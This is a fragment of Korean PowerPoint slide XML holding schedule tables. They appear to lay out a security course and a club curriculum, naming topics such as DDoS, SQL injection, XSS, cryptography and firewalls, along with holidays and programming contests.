                        </a:rPr>
                        <a:t>(DDoS) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>공격</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t> </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어린이날</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(5.5(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>수</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700" kern="0" spc="-100">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>옥포제</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="-100">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(5.6(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="-100">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>목</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="-100">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>)~7(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="-100">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>금</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="-10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0607172"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="50795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DDOS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>SYN Flooding, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>Slowloris</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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공격</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32816879"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="43285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시스템위협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패스워드 획득</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악성코드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60" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>석가탄신일</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="-60" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(5.19(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="-60" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="-6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9168473"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="432852">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공격</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크래킹</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주요 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28124569"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="374536">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사이버방어기술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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>암호</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="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치환 및 전치 암호</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대칭키 및 비대칭키 암호</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4487891"/>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시저</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비즈네르</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>rsa</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블록암호</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(CBC &amp; ECB) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>모드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03627477"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4854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 방어 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90">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="-90">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>시스템 및 네트워크 보안</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="-9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사용자 인증 및 백신프로그램</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방화벽</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, IDS, IPS, VPN</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700" kern="0" spc="-60">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>OCS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="-60">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>임관식</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="-60">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(5.28(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="-60">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>금</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="-6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0500898"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="56491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방화벽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웹 구조 및 취약점</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4974341"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="40008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초빙강연</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사이버전에 대한 해군의 대비태세</a:t>
                      </a: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3456134"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="60463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SQL injection </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="8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800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>공격 및 대응</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin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파일 다운로드 취약점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83529111"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="451176">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[6.7(</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11.(</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dirty="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7750826"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23416592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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>Login </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>과정</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>들여다보기 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>(+</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>데이터베이스</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>vmware</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en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>SQL injection </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>이란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 보안 의 국가적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en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>SQL injection </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>취약점</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Window – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>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a:t>Apache </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>WS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>보안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Window – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>비대칭키로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a:t>– Directory </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>Listing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암호 실습</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>해쉬값</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 구하기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민감 데이터 노출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웹 인증과 세션 과정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Linux – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>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하이재킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>과 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Session</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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Linux – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>비대칭키로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인증 및 세션관리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파일 다운로드</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업로드 취약점이란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파일 다운로드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ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>네트워크 패킷 탐지 및 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ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>웹쉘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 을 이용한 접근 통제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DDOS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과거 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이론 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>URL Redirect </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>공격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로그 분석 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- DDOS 7.7 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>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en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>URL Redirect</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>공격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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>XSS, CSRF </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>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XSS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>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CSRF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3225766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72ED559A-5CA8-4324-B002-5A50B0FAF039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="723475732"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1255109" y="2214747"/>
          <a:ext cx="9479902" cy="3679376"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1552459">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3623680942"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1498651">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1126213368"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1688841">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="672617493"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="783771">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2343994642"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1978090">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3922511956"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1978090">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="98228301"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="898790">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4~5</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분반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 </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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2206188386"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="901343">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 동아리 소개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언어 기초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문제풀이 기초</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solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>BaekJoon</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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3 ~ 9 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>명</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 3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>의배수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국제 프로그래밍 대회</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>(ICPC)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 실전 준비</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ICPC </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>참가</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solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>본선 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>월</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>예선 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>11</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>월</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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8060801"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="901343">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문제풀이 심화</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코드게이트</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 참가</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solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>월</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, 2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>일간</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6159294"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="932374">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보안 기초</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solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>HackerSchool</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:solidFill>
